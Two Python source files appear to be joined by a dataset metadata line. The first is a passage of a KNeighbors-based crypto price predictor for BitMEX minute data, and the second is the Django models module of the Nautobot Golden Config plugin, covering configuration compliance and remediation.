n = self._GetNumFeatures()
B = np.zeros([m, n])
# Preserve order of spreadsheet
for i in range(m - 1, -1, -1):
self._GetSample(B[i], i, D)
# Return the internal numpy array
return B
# Extracts the target values from stock market data
#
# D: A dataframe from ParseData
# ret: The data matrix of targets and the
def _ExtractTarg(self, D):
# Timestamp column is not predicted
tmp = D.drop('Timestamp', axis=1)
# Return the internal numpy array
return tmp.values, tmp.columns
# Get the number of features in the data matrix
#
# n: The number of previous days to include
# self.npd is used if n is None
# ret: The number of features in the data matrix
def _GetNumFeatures(self, n=None):
if (n is None):
n = self.npd
return n * 7 + 1
# Get the sample for a specific row in the dataframe.
# A sample consists of the current timestamp and the data from
# the past n rows of the dataframe
#
# r: The array to fill with data
# i: The index of the row for which to build a sample
# df: The dataframe to use
# return; r
def _GetSample(self, r, i, df):
# First value is the timestamp
r[0] = df['Timestamp'].values[i]
# The number of columns in df
n = df.shape[1]
# The last valid index
lim = df.shape[0]
# Each sample contains the past n days of stock data; for non-existing data
# repeat last available sample
# Format of row:
# Timestamp Volume Open[i] High[i] ... Open[i-1] High[i-1]... etc
for j in range(0, self.npd):
# Subsequent rows contain older data in the spreadsheet
ind = i + j + 1
# If there is no older data, duplicate the oldest available values
if (ind >= lim):
ind = lim - 1
# Add all columns from row[ind]
for k, c in enumerate(df.columns):
# + 1 is needed as timestamp is at index 0
r[k + 1 + n * j] = df[c].values[ind]
return r
# Attempts to learn the stock market data
# given a dataframe taken from ParseData
#
# D: A dataframe from ParseData
def Learn(self, D):
# Keep track of the currently learned data
self.D = D.copy()
self.D_orig = D.copy()
# self.S = StandardScaler(with_mean=True, with_std=True)
# Keep track of old timestamps for indexing
self.DTS = np.asarray(self.D.Timestamp.values)
# Scale the data
self.S.fit(self.D)
self.D[self.D.columns] = self.S.transform(self.D)
# Get features from the data frame
self.A = self._ExtractFeat(self.D)
# Get the target values and their corresponding column names
self.y, self.targCols = self._ExtractTarg(self.D)
# Create the regressor model and fit it
self.R.fit(self.A, self.y)
return True
# Predicts values for each row of the dataframe. Can be used to
# estimate performance of the model
#
# df: The dataframe for which to make prediction
# return: A dataframe containing the predictions
def PredictDF(self, df):
# Make a local copy to prevent modifying df
D = df.copy()
# Scale the input data like the training data
D[D.columns] = self.S.transform(D)
# Get features
A = self._ExtractFeat(D)
# Construct a dataframe to contain the predictions
# Column order was saved earlier
P = pd.DataFrame(index=range(A.shape[0]), columns=self.targCols)
# Perform prediction
P[P.columns] = self.R.predict(A)
# Add the timestamp (already scaled from above)
P['Timestamp'] = D['Timestamp'].values
# Scale the data back to original range
P[P.columns] = self.S.inverse_transform(P)
return P
# Predict the stock price during a specified time
#
# startDate: The start date as a string in yyyy-mm-dd format
# endDate: The end date as a string yyyy-mm-dd format
# period: 'daily', 'weekly', or 'monthly' for the time period
# between predictions
# return: A dataframe containing the predictions or
def PredictDate(self, startDate, endDate, period='minute'):
# Create the range of timestamps and reverse them
ts = DateRange(startDate, endDate, period)[::-1]
m = ts.shape[0]
# Prediction is based on data prior to start date
# Get timestamp of previous day
prevts_ = datetime.fromtimestamp(ts[-1]) - timedelta(minutes=1)
prevts = np.asarray(prevts_.timestamp())
# Test if there is enough data to continue
try:
ind = np.where(self.DTS <= prevts)[0][0]
except IndexError:
logger.info('Safety ON')
ind = 0
pass
# There is enough data to perform prediction; allocate new data frame
P = pd.DataFrame(np.zeros((self.D.shape[0], self.D.shape[1])), index=range(self.D.shape[0]), columns=self.D.columns)
# Add in the timestamp column so that it can be scaled properly
P.loc[int(m):int(self.D.shape[0]), 'Timestamp'] = self.D.loc[0:(int(self.D.shape[0] - m)), 'Timestamp']
P.loc[0:int(m - 1), 'Timestamp'] = ts
for i in range(self.D.shape[0] - m):
# If the current index does not exist, repeat the last valid data
curInd = ind + i
if (curInd >= self.D.shape[0]):
curInd = curInd - 1
# Copy over the past data (already scaled)
P.iloc[int(m + i)] = self.D_orig.xs(int(curInd))
# for i in range(len(P)):
# print(datetime.datetime.fromtimestamp(P.loc[i, 'Timestamp']))
# Scale the timestamp (other fields are 0)
self.S.fit(P)
P[P.columns] = self.S.transform(P)
P = P[0:int(m * 2)]
# B is to be the data matrix of features
B = np.zeros((1, self._GetNumFeatures()))
# Add extra last entries for past existing data
# Loop until end date is reached
# print(P)
for i in range(m - 1, -1, -1):
# Create one sample
self._GetSample(B[0], i, P)
# Predict the row of the dataframe and save it
pred = self.R.predict(B).ravel()
for j, k in zip(self.targCols, pred):
P.at[i, j] = k
# Discard extra rows needed for prediction
# Scale the dataframe back to the original range
P[P.columns] = self.S.inverse_transform(P)
'''for i in range(len(P)):
print(datetime.fromtimestamp(P.loc[i, 'Timestamp']))
print(P)'''
'''j = 0
for i in P.Timestamp:
print(dt.fromtimestamp(i))
j += 1
if j > 10:
break'''
# PlotData(P)
P = P[0:m]
return P
# Test the predictors performance and
# displays results to the screen
#
# D: The dataframe for which to make prediction
def Performance(self, df=None):
# If no dataframe is provided, use the currently learned one
if df is None:
D = self.D.copy()
else:
self.S.fit(df)
D = self.S.transform(df)
# Get features from the data frame
A = self._ExtractFeat(D)
# Get the target values and their corresponding column names
y, _ = self._ExtractTarg(D)
# Begin cross validation
ss = ShuffleSplit(n_splits=1, test_size=0.1, train_size=0.9, random_state=0)
for trn, tst in ss.split(A):
s2 = cross_val_score(self.R, A[tst], y[tst], cv=5, scoring=make_scorer(r2_score), n_jobs=-1)
if len(s2) > 1:
return s2.mean()
elif len(s2) == 1:
logger.info(str(s2))
return s2
else:
return 0
class ML_Calculus:
def __init__(self, ws_bmex, rest, instrument, history_count, per_pred, API_key, API_secret):
self.client = rest
self.instrument_bmex = instrument
self.API_key_bmex = API_key
self.API_secret_bmex = API_secret
self.periods_pred = per_pred - 1
self.p_verdict = 0
self.D = None
self.ready = False
self.history = Historical_Caching(ws_bmex, rest, instrument, history_count)
self.thread = threading.Thread(target=self.Engine)
self.R = KNeighborsRegressor(n_neighbors=10, weights='distance', algorithm='auto', leaf_size=25, n_jobs=-1)
self.sp_Classic = Predictor(rmodel=self.R, nPastDays=50)
self.logger = logging.getLogger(__name__)
def Main(self, args):
if (len(args) != 3 and len(args) != 4):
return
# Test if file exists
try:
open(args[0])
except Exception as e:
logger.error('Error opening args: ' + args[0])
logger.error(str(e))
return
if (len(args) == 4):
predPrd = args[3]
if predPrd == 'm':
predPrd = 'minute'
if predPrd == 'D':
predPrd = 'daily'
if predPrd == 'W':
predPrd = 'weekly'
if predPrd == 'M':
predPrd = 'monthly'
try:
# Everything looks okay; proceed with program
# Grab the data frame
# self.D = pand.DataFrame(index=range(self.hc))
self.D = None
self.D = ParseData(args[0])
# The number of previous days of data used
# when making a prediction
# PlotData(D)
s2_mean = 0
P = None
i = 0
res = 0
while res < 1:
self.sp_Classic.Learn(self.D)
res += 1
while s2_mean < 0.70 and i < 3:
# Learn the dataset and then display performance statistics
# sp.TestPerformance()
# Perform prediction for a specified date range
P = self.sp_Classic.PredictDate(args[1], args[2])
if P is None:
logger.info(self.instrument_bmex + ': TYPE 2 Reboot')
return 0, 0, 0
s2_mean = self.sp_Classic.Performance()
# Keep track of number of predicted results for plot
# n = P.shape[0]
# Append the predicted results to the actual results
# D = P.append(D)
# Predicted results are the first n rows
# D.to_csv(r'xbt_m1_treated.csv', index=False)
# PlotData(D, range(n + 1))'''
i += 1
# print(P)
return i, P, s2_mean
except Exception as e:
logger.error(str(e))
sleep(1)
return 0, 0, 0
def Engine(self):
datetime_minute_cached = None
fails = 0
self.history.start_supplychain()
while self.history.get_data_loaded() is False or self.history.get_run_completed() is False:
logger.info(self.instrument_bmex + ': Waiting for historical data... ')
sleep(5)
continue
logger.info(self.instrument_bmex + ': Starting machine learning computation...')
while True:
try:
if datetime_minute_cached != datetime.utcnow().minute: # and self.history.get_run_completed() is True:
start_timer = timer()
timestamp_ = datetime.now(timezone.utc).strftime('%Y-%m-%d %H:%M:00')
timestamp = datetime.strptime(timestamp_, '%Y-%m-%d %H:%M:%S').replace(tzinfo=timezone.utc)
timestamp = timestamp.timetuple()
start_ts = time.mktime(timestamp)
timestamp = datetime.strptime(timestamp_, '%Y-%m-%d %H:%M:%S').replace(tzinfo=timezone.utc) + timedelta(minutes=(self.periods_pred))
timestamp = timestamp.timetuple()
end_ts = time.mktime(timestamp)
naming = str(self.instrument_bmex + "_pair_m1.csv")
p = None
counter = 0
while isinstance(p, pd.DataFrame) is False and counter < 5:
i, p, s2_mean = self.Main([naming, start_ts, end_ts, 'm'])
counter += 1
if counter >= 5:
logger.warning(self.instrument_bmex + ': Predictor: Error p format')
continue
elif s2_mean < 0.70:
self.p_verdict = 0
logger.info(self.instrument_bmex + ' Processing Time: ' + str(round(timer() - start_timer, 5)))
logger.info(self.instrument_bmex + ': Machine learning : UNCONCLUSIVE !')
self.ready = True
fails += 1
datetime_minute_cached = datetime.utcnow().minute
# print('shape: ', p.shape)
# print(p)
# print(datetime.datetime.fromtimestamp(p.loc[0, 'Timestamp']))
# print(datetime.datetime.fromtimestamp(p.loc[1, 'Timestamp']))
# print(datetime.fromtimestamp(p.loc[self.periods_pred, 'Timestamp']))
# print(p)
else:
if np.isnan(s2_mean):
self.p_verdict = 0
else:
temp = self.periods_pred - 1
temp_1 = p.loc[temp + 1, 'Close']
temp_2 = p.loc[temp + 1, 'Close']
j = 0
k = 0
while temp >= 0:
p_close_tx = p.loc[temp, 'Close']
if temp_1 < p_close_tx:
j += 1
elif temp_2 > p_close_tx:
k += 1
temp_1 = temp_2 = p_close_tx
temp -= 1
if j >= self.periods_pred:
self.p_verdict = -1
elif k >= self.periods_pred:
self.p_verdict = 1
else:
self.p_verdict = 0
logger.info(self.instrument_bmex + ' Processing Time: ' + str(round(timer() - start_timer, 5)))
if self.p_verdict == 0:
logger.info(self.instrument_bmex + ' -> Machine learning : NEUTRAL !')
elif self.p_verdict > 0:
logger.info(self.instrument_bmex + ' -> Machine learning : UP !')
else:
logger.info(self.instrument_bmex + ' -> Machine learning : DOWN !')
self.ready = True
datetime_minute_cached = datetime.utcnow().minute
fails = 0
logger.info(self.instrument_bmex + ' -> Machine learning / Non-gaussian metric : ' + str(round(s2_mean * 100, 2)) + "% (iter: " + str(i) + ")")
sleep(0.1)
except Exception as e:
logger.error(str(e))
sleep(1)
pass
def start_ml(self):
self.thread.daemon = True
self.thread.start()
def get_p_verdict(self):
if self.p_verdict > 0:
verdict = 1
elif self.p_verdict < 0:
verdict = -1
else:
verdict = 0
return verdict
| 5ymph0en1x/SyDOM | utils/predictor.py | predictor.py | py | 21,887 | python | en | code | 82 | github-code | 36 |
21131384578 | """Django Models for tracking the configuration compliance per feature and device."""
import json
import logging
from deepdiff import DeepDiff
from django.core.exceptions import ValidationError
from django.db import models
from django.utils.module_loading import import_string
from hier_config import Host as HierConfigHost
from nautobot.core.models.generics import PrimaryModel
from nautobot.core.models.utils import serialize_object, serialize_object_v2
from nautobot.dcim.models import Device
from nautobot.extras.models import ObjectChange
from nautobot.extras.models.statuses import StatusField
from nautobot.extras.utils import extras_features
from netutils.config.compliance import feature_compliance
from nautobot_golden_config.choices import ComplianceRuleConfigTypeChoice, ConfigPlanTypeChoice, RemediationTypeChoice
from nautobot_golden_config.utilities.constant import ENABLE_SOTAGG, PLUGIN_CFG
LOGGER = logging.getLogger(__name__)
GRAPHQL_STR_START = "query ($device_id: ID!)"
ERROR_MSG = (
"There was an issue with the data that was returned by your get_custom_compliance function. "
"This is a local issue that requires the attention of your systems administrator and not something "
"that can be fixed within the Golden Config plugin. "
)
MISSING_MSG = (
ERROR_MSG + "Specifically the `{}` key was not found in value the get_custom_compliance function provided."
)
VALIDATION_MSG = (
ERROR_MSG + "Specifically the key {} was expected to be of type(s) {} and the value of {} was not that type(s)."
)
CUSTOM_FUNCTIONS = {
"get_custom_compliance": "custom",
"get_custom_remediation": RemediationTypeChoice.TYPE_CUSTOM,
}
def _is_jsonable(val):
"""Check is value can be converted to json."""
try:
json.dumps(val)
return True
except (TypeError, OverflowError):
return False
def _null_to_empty(val):
"""Convert to empty string if the value is currently null."""
if not val:
return ""
return val
def _get_cli_compliance(obj):
"""This function performs the actual compliance for cli configuration."""
feature = {
"ordered": obj.rule.config_ordered,
"name": obj.rule,
}
feature.update({"section": obj.rule.match_config.splitlines()})
value = feature_compliance(
feature, obj.actual, obj.intended, obj.device.platform.network_driver_mappings.get("netutils_parser")
)
compliance = value["compliant"]
if compliance:
compliance_int = 1
ordered = value["ordered_compliant"]
else:
compliance_int = 0
ordered = value["ordered_compliant"]
missing = _null_to_empty(value["missing"])
extra = _null_to_empty(value["extra"])
return {
"compliance": compliance,
"compliance_int": compliance_int,
"ordered": ordered,
"missing": missing,
"extra": extra,
}
def _get_json_compliance(obj):
"""This function performs the actual compliance for json serializable data."""
def _normalize_diff(diff, path_to_diff):
"""Normalizes the diff to a list of keys and list indexes that have changed."""
dictionary_items = list(diff.get(f"dictionary_item_{path_to_diff}", []))
list_items = list(diff.get(f"iterable_item_{path_to_diff}", {}).keys())
values_changed = list(diff.get("values_changed", {}).keys())
type_changes = list(diff.get("type_changes", {}).keys())
return dictionary_items + list_items + values_changed + type_changes
diff = DeepDiff(obj.actual, obj.intended, ignore_order=obj.ordered, report_repetition=True)
if not diff:
compliance_int = 1
compliance = True
ordered = True
missing = ""
extra = ""
else:
compliance_int = 0
compliance = False
ordered = False
missing = _null_to_empty(_normalize_diff(diff, "added"))
extra = _null_to_empty(_normalize_diff(diff, "removed"))
return {
"compliance": compliance,
"compliance_int": compliance_int,
"ordered": ordered,
"missing": missing,
"extra": extra,
}
def _verify_get_custom_compliance_data(compliance_details):
"""This function verifies the data is as expected when a custom function is used."""
for val in ["compliance", "compliance_int", "ordered", "missing", "extra"]:
try:
compliance_details[val]
except KeyError:
raise ValidationError(MISSING_MSG.format(val)) from KeyError
for val in ["compliance", "ordered"]:
if compliance_details[val] not in [True, False]:
raise ValidationError(VALIDATION_MSG.format(val, "Boolean", compliance_details[val]))
if compliance_details["compliance_int"] not in [0, 1]:
raise ValidationError(VALIDATION_MSG.format("compliance_int", "0 or 1", compliance_details["compliance_int"]))
for val in ["missing", "extra"]:
if not isinstance(compliance_details[val], str) and not _is_jsonable(compliance_details[val]):
raise ValidationError(VALIDATION_MSG.format(val, "String or Json", compliance_details[val]))
def _get_hierconfig_remediation(obj):
"""Returns the remediating config."""
hierconfig_os = obj.device.platform.network_driver_mappings["hier_config"]
if not hierconfig_os:
raise ValidationError(f"platform {obj.network_driver} is not supported by hierconfig.")
try:
remediation_setting_obj = RemediationSetting.objects.get(platform=obj.rule.platform)
except Exception as err: # pylint: disable=broad-except:
raise ValidationError(f"Platform {obj.network_driver} has no Remediation Settings defined.") from err
remediation_options = remediation_setting_obj.remediation_options
try:
hc_kwargs = {"hostname": obj.device.name, "os": hierconfig_os}
if remediation_options:
hc_kwargs.update(hconfig_options=remediation_options)
host = HierConfigHost(**hc_kwargs)
except Exception as err: # pylint: disable=broad-except:
raise Exception( # pylint: disable=broad-exception-raised
f"Cannot instantiate HierConfig on {obj.device.name}, check Device, Platform and Hier Options."
) from err
host.load_generated_config(obj.intended)
host.load_running_config(obj.actual)
host.remediation_config()
remediation_config = host.remediation_config_filtered_text(include_tags={}, exclude_tags={})
return remediation_config
# The below maps the provided compliance types
FUNC_MAPPER = {
ComplianceRuleConfigTypeChoice.TYPE_CLI: _get_cli_compliance,
ComplianceRuleConfigTypeChoice.TYPE_JSON: _get_json_compliance,
RemediationTypeChoice.TYPE_HIERCONFIG: _get_hierconfig_remediation,
}
# The below conditionally add the custom provided compliance type
for custom_function, custom_type in CUSTOM_FUNCTIONS.items():
if PLUGIN_CFG.get(custom_function):
try:
FUNC_MAPPER[custom_type] = import_string(PLUGIN_CFG[custom_function])
except Exception as error: # pylint: disable=broad-except
msg = (
"There was an issue attempting to import the custom function of"
f"{PLUGIN_CFG[custom_function]}, this is expected with a local configuration issue "
"and not related to the Golden Configuration Plugin, please contact your system admin for further details"
)
raise Exception(msg).with_traceback(error.__traceback__)
@extras_features(
"custom_fields",
"custom_validators",
"export_templates",
"graphql",
"relationships",
"webhooks",
)
class ComplianceFeature(PrimaryModel): # pylint: disable=too-many-ancestors
"""ComplianceFeature details."""
name = models.CharField(max_length=100, unique=True)
slug = models.SlugField(max_length=100, unique=True)
description = models.CharField(max_length=200, blank=True)
class Meta:
"""Meta information for ComplianceFeature model."""
ordering = ("slug",)
def __str__(self):
"""Return a sane string representation of the instance."""
return self.slug
@extras_features(
"custom_fields",
"custom_validators",
"export_templates",
"graphql",
"relationships",
"webhooks",
)
class ComplianceRule(PrimaryModel): # pylint: disable=too-many-ancestors
"""ComplianceRule details."""
feature = models.ForeignKey(to="ComplianceFeature", on_delete=models.CASCADE, related_name="feature")
platform = models.ForeignKey(
to="dcim.Platform",
on_delete=models.CASCADE,
related_name="compliance_rules",
)
description = models.CharField(
max_length=200,
blank=True,
)
config_ordered = models.BooleanField(
verbose_name="Configured Ordered",
help_text="Whether or not the configuration order matters, such as in ACLs.",
default=False,
)
config_remediation = models.BooleanField(
default=False,
verbose_name="Config Remediation",
help_text="Whether or not the config remediation is executed for this compliance rule.",
)
match_config = models.TextField(
blank=True,
verbose_name="Config to Match",
help_text="The config to match that is matched based on the parent most configuration. E.g.: For CLI `router bgp` or `ntp`. For JSON this is a top level key name.",
)
config_type = models.CharField(
max_length=20,
default=ComplianceRuleConfigTypeChoice.TYPE_CLI,
choices=ComplianceRuleConfigTypeChoice,
help_text="Whether the configuration is in CLI or JSON/structured format.",
)
custom_compliance = models.BooleanField(
default=False, help_text="Whether this Compliance Rule is proceeded as custom."
)
@property
def remediation_setting(self):
"""Returns remediation settings for a particular platform."""
return RemediationSetting.objects.filter(platform=self.platform).first()
class Meta:
"""Meta information for ComplianceRule model."""
ordering = ("platform", "feature__name")
unique_together = (
"feature",
"platform",
)
def __str__(self):
"""Return a sane string representation of the instance."""
return f"{self.platform} - {self.feature.name}"
def clean(self):
"""Verify that if cli, then match_config is set."""
if self.config_type == ComplianceRuleConfigTypeChoice.TYPE_CLI and not self.match_config:
raise ValidationError("CLI configuration set, but no configuration set to match.")
@extras_features(
"custom_fields",
"custom_links",
"custom_validators",
"export_templates",
"graphql",
"relationships",
"webhooks",
)
class ConfigCompliance(PrimaryModel): # pylint: disable=too-many-ancestors
"""Configuration compliance details."""
device = models.ForeignKey(to="dcim.Device", on_delete=models.CASCADE, help_text="The device")
rule = models.ForeignKey(to="ComplianceRule", on_delete=models.CASCADE, related_name="rule")
compliance = models.BooleanField(blank=True)
actual = models.JSONField(blank=True, help_text="Actual Configuration for feature")
intended = models.JSONField(blank=True, help_text="Intended Configuration for feature")
# these three are config snippets exposed for the ConfigDeployment.
remediation = models.JSONField(blank=True, help_text="Remediation Configuration for the device")
missing = models.JSONField(blank=True, help_text="Configuration that should be on the device.")
extra = models.JSONField(blank=True, help_text="Configuration that should not be on the device.")
ordered = models.BooleanField(default=False)
# Used for django-pivot, both compliance and compliance_int should be set.
compliance_int = models.IntegerField(blank=True)
def to_objectchange(
self, action, *, related_object=None, object_data_extra=None, object_data_exclude=None
): # pylint: disable=arguments-differ
"""Remove actual and intended configuration from changelog."""
if not object_data_exclude:
object_data_exclude = ["actual", "intended"]
return ObjectChange(
changed_object=self,
object_repr=str(self),
action=action,
object_data=serialize_object(self, extra=object_data_extra, exclude=object_data_exclude),
object_data_v2=serialize_object_v2(self),
related_object=related_object,
)
class Meta:
"""Set unique together fields for model."""
ordering = ["device", "rule"]
unique_together = ("device", "rule")
def __str__(self):
"""String representation of a the compliance."""
return f"{self.device} -> {self.rule} -> {self.compliance}"
def compliance_on_save(self):
"""The actual configuration compliance happens here, but the details for actual compliance job would be found in FUNC_MAPPER."""
if self.rule.custom_compliance:
if not FUNC_MAPPER.get("custom"):
raise ValidationError(
"Custom type provided, but no `get_custom_compliance` config set, please contact system admin."
)
compliance_details = FUNC_MAPPER["custom"](obj=self)
_verify_get_custom_compliance_data(compliance_details)
else:
compliance_details = FUNC_MAPPER[self.rule.config_type](obj=self)
self.compliance = compliance_details["compliance"]
self.compliance_int = compliance_details["compliance_int"]
self.ordered = compliance_details["ordered"]
self.missing = compliance_details["missing"]
self.extra = compliance_details["extra"]
def remediation_on_save(self):
"""The actual remediation happens here, before saving the object."""
if self.compliance:
self.remediation = ""
return
if not self.rule.config_remediation:
self.remediation = ""
return
if not self.rule.remediation_setting:
self.remediation = ""
return
remediation_config = FUNC_MAPPER[self.rule.remediation_setting.remediation_type](obj=self)
self.remediation = remediation_config
def save(self, *args, **kwargs):
"""The actual configuration compliance happens here, but the details for actual compliance job would be found in FUNC_MAPPER."""
self.compliance_on_save()
self.remediation_on_save()
self.full_clean()
super().save(*args, **kwargs)
@extras_features(
"custom_fields",
"custom_links",
"custom_validators",
"export_templates",
"graphql",
"relationships",
"webhooks",
)
class GoldenConfig(PrimaryModel): # pylint: disable=too-many-ancestors
"""Configuration Management Model."""
device = models.OneToOneField(
to="dcim.Device",
on_delete=models.CASCADE,
help_text="device",
blank=False,
)
backup_config = models.TextField(blank=True, help_text="Full backup config for device.")
backup_last_attempt_date = models.DateTimeField(null=True, blank=True)
backup_last_success_date = models.DateTimeField(null=True, blank=True)
intended_config = models.TextField(blank=True, help_text="Intended config for the device.")
intended_last_attempt_date = models.DateTimeField(null=True, blank=True)
intended_last_success_date = models.DateTimeField(null=True, blank=True)
compliance_config = models.TextField(blank=True, help_text="Full config diff for device.")
compliance_last_attempt_date = models.DateTimeField(null=True, blank=True)
compliance_last_success_date = models.DateTimeField(null=True, blank=True)
def to_objectchange(
self, action, *, related_object=None, object_data_extra=None, object_data_exclude=None
): # pylint: disable=arguments-differ
"""Remove actual and intended configuration from changelog."""
if not object_data_exclude:
object_data_exclude = ["backup_config", "intended_config", "compliance_config"]
return ObjectChange(
changed_object=self,
object_repr=str(self),
action=action,
object_data=serialize_object(self, extra=object_data_extra, exclude=object_data_exclude),
object_data_v2=serialize_object_v2(self),
related_object=related_object,
)
@staticmethod
def get_dynamic_group_device_pks():
"""Get all Device PKs associated with GoldenConfigSetting DynamicGroups."""
gc_dynamic_group_device_queryset = Device.objects.none()
for setting in GoldenConfigSetting.objects.all():
# using "|" should not require calling distinct afterwards
gc_dynamic_group_device_queryset = gc_dynamic_group_device_queryset | setting.dynamic_group.members
return set(gc_dynamic_group_device_queryset.values_list("pk", flat=True))
@classmethod
def get_golden_config_device_ids(cls):
"""Get all Device PKs associated with GoldenConfig entries."""
return set(cls.objects.values_list("device__pk", flat=True))
class Meta:
"""Set unique together fields for model."""
ordering = ["device"]
def __str__(self):
"""String representation of a the compliance."""
return f"{self.device}"
@extras_features(
"graphql",
)
class GoldenConfigSetting(PrimaryModel): # pylint: disable=too-many-ancestors
"""GoldenConfigSetting Model definition. This provides global configs instead of via configs.py."""
name = models.CharField(max_length=100, unique=True)
slug = models.SlugField(max_length=100, unique=True)
weight = models.PositiveSmallIntegerField(default=1000)
description = models.CharField(
max_length=200,
blank=True,
)
backup_repository = models.ForeignKey(
to="extras.GitRepository",
on_delete=models.PROTECT,
null=True,
blank=True,
related_name="backup_repository",
limit_choices_to={"provided_contents__contains": "nautobot_golden_config.backupconfigs"},
)
backup_path_template = models.CharField(
max_length=255,
blank=True,
verbose_name="Backup Path in Jinja Template Form",
help_text="The Jinja path representation of where the backup file will be found. The variable `obj` is available as the device instance object of a given device, as is the case for all Jinja templates. e.g. `{{obj.location.name|slugify}}/{{obj.name}}.cfg`",
)
intended_repository = models.ForeignKey(
to="extras.GitRepository",
on_delete=models.PROTECT,
null=True,
blank=True,
related_name="intended_repository",
limit_choices_to={"provided_contents__contains": "nautobot_golden_config.intendedconfigs"},
)
intended_path_template = models.CharField(
max_length=255,
blank=True,
verbose_name="Intended Path in Jinja Template Form",
help_text="The Jinja path representation of where the generated file will be places. e.g. `{{obj.location.name|slugify}}/{{obj.name}}.cfg`",
)
jinja_repository = models.ForeignKey(
to="extras.GitRepository",
on_delete=models.PROTECT,
null=True,
blank=True,
related_name="jinja_template",
limit_choices_to={"provided_contents__contains": "nautobot_golden_config.jinjatemplate"},
)
jinja_path_template = models.CharField(
max_length=255,
blank=True,
verbose_name="Template Path in Jinja Template Form",
help_text="The Jinja path representation of where the Jinja template can be found. e.g. `{{obj.platform.network_driver}}.j2`",
)
backup_test_connectivity = models.BooleanField(
default=True,
verbose_name="Backup Test",
help_text="Whether or not to pretest the connectivity of the device by verifying there is a resolvable IP that can connect to port 22.",
)
sot_agg_query = models.ForeignKey(
to="extras.GraphQLQuery",
on_delete=models.PROTECT,
null=True,
blank=True,
related_name="sot_aggregation",
)
dynamic_group = models.OneToOneField(
to="extras.DynamicGroup",
on_delete=models.PROTECT,
related_name="golden_config_setting",
)
def __str__(self):
"""Return a simple string if model is called."""
return f"Golden Config Setting - {self.name}"
class Meta:
"""Set unique fields for model.
Provide ordering used in tables and get_device_to_settings_map.
Sorting on weight is performed from the highest weight value to the lowest weight value.
This is to ensure only one plugin settings could be applied per single device based on priority and name.
"""
verbose_name = "Golden Config Setting"
ordering = ["-weight", "name"] # Refer to weight comment in class docstring.
def clean(self):
"""Validate the scope and GraphQL query."""
super().clean()
if ENABLE_SOTAGG and not self.sot_agg_query:
raise ValidationError("A GraphQL query must be defined when `ENABLE_SOTAGG` is True")
if self.sot_agg_query:
LOGGER.debug("GraphQL - test query start with: `%s`", GRAPHQL_STR_START)
if not str(self.sot_agg_query.query.lstrip()).startswith(GRAPHQL_STR_START):
raise ValidationError(f"The GraphQL query must start with exactly `{GRAPHQL_STR_START}`")
def get_queryset(self):
"""Generate a Device QuerySet from the filter."""
return self.dynamic_group.members
def device_count(self):
"""Return the number of devices in the group."""
return self.dynamic_group.count
def get_url_to_filtered_device_list(self):
"""Get url to all devices that are matching the filter."""
return self.dynamic_group.get_group_members_url()
@extras_features(
"custom_fields",
"custom_links",
"custom_validators",
"export_templates",
"graphql",
"relationships",
"webhooks",
)
class ConfigRemove(PrimaryModel): # pylint: disable=too-many-ancestors
"""ConfigRemove for Regex Line Removals from Backup Configuration Model definition."""
name = models.CharField(max_length=255)
platform = models.ForeignKey(
to="dcim.Platform",
on_delete=models.CASCADE,
related_name="backup_line_remove",
)
description = models.CharField(
max_length=200,
blank=True,
)
regex = models.CharField(
max_length=200,
verbose_name="Regex Pattern",
help_text="Regex pattern used to remove a line from the backup configuration.",
)
clone_fields = ["platform", "description", "regex"]
class Meta:
"""Meta information for ConfigRemove model."""
ordering = ("platform", "name")
unique_together = ("name", "platform")
def __str__(self):
"""Return a simple string if model is called."""
return self.name
@extras_features(
"custom_fields",
"custom_links",
"custom_validators",
"export_templates",
"graphql",
"relationships",
"webhooks",
)
class ConfigReplace(PrimaryModel): # pylint: disable=too-many-ancestors
"""ConfigReplace for Regex Line Replacements from Backup Configuration Model definition."""
name = models.CharField(max_length=255)
platform = models.ForeignKey(
to="dcim.Platform",
on_delete=models.CASCADE,
related_name="backup_line_replace",
)
description = models.CharField(
max_length=200,
blank=True,
)
regex = models.CharField(
max_length=200,
verbose_name="Regex Pattern to Substitute",
help_text="Regex pattern that will be found and replaced with 'replaced text'.",
)
replace = models.CharField(
max_length=200,
verbose_name="Replaced Text",
help_text="Text that will be inserted in place of Regex pattern match.",
)
clone_fields = ["platform", "description", "regex", "replace"]
class Meta:
"""Meta information for ConfigReplace model."""
ordering = ("platform", "name")
unique_together = ("name", "platform")
def __str__(self):
"""Return a simple string if model is called."""
return self.name
@extras_features(
"custom_fields",
"custom_links",
"custom_validators",
"export_templates",
"graphql",
"relationships",
"webhooks",
)
class RemediationSetting(PrimaryModel): # pylint: disable=too-many-ancestors
"""RemediationSetting details."""
# Remediation points to the platform
platform = models.OneToOneField(
to="dcim.Platform",
on_delete=models.CASCADE,
related_name="remediation_settings",
)
remediation_type = models.CharField(
max_length=50,
default=RemediationTypeChoice.TYPE_HIERCONFIG,
choices=RemediationTypeChoice,
help_text="Whether the remediation setting is type HierConfig or custom.",
)
# takes options.json.
remediation_options = models.JSONField(
blank=True,
default=dict,
help_text="Remediation Configuration for the device",
)
csv_headers = [
"platform",
"remediation_type",
]
class Meta:
"""Meta information for RemediationSettings model."""
ordering = ("platform", "remediation_type")
def to_csv(self):
"""Indicates model fields to return as csv."""
return (
self.platform,
self.remediation_type,
)
def __str__(self):
"""Return a sane string representation of the instance."""
return str(self.platform)
@extras_features(
"custom_fields",
"custom_links",
"custom_validators",
"export_templates",
"graphql",
"relationships",
"webhooks",
"statuses",
)
class ConfigPlan(PrimaryModel): # pylint: disable=too-many-ancestors
"""ConfigPlan for Golden Configuration Plan Model definition."""
plan_type = models.CharField(max_length=20, choices=ConfigPlanTypeChoice, verbose_name="Plan Type")
device = models.ForeignKey(
to="dcim.Device",
on_delete=models.CASCADE,
related_name="config_plan",
)
config_set = models.TextField(help_text="Configuration set to be applied to device.")
feature = models.ManyToManyField(
to=ComplianceFeature,
related_name="config_plan",
blank=True,
)
plan_result = models.ForeignKey(
to="extras.JobResult",
on_delete=models.CASCADE,
related_name="config_plan",
verbose_name="Plan Result",
)
deploy_result = models.ForeignKey(
to="extras.JobResult",
on_delete=models.PROTECT,
related_name="config_plan_deploy_result",
verbose_name="Deploy Result",
blank=True,
null=True,
)
change_control_id = models.CharField(
max_length=50,
blank=True,
verbose_name="Change Control ID",
help_text="Change Control ID for this configuration plan.",
)
change_control_url = models.URLField(blank=True, verbose_name="Change Control URL")
status = StatusField(blank=True, null=True, on_delete=models.PROTECT)
class Meta:
"""Meta information for ConfigPlan model."""
ordering = ("-created", "device")
unique_together = (
"plan_type",
"device",
"created",
)
def __str__(self):
"""Return a simple string if model is called."""
return f"{self.device.name}-{self.plan_type}-{self.created}"
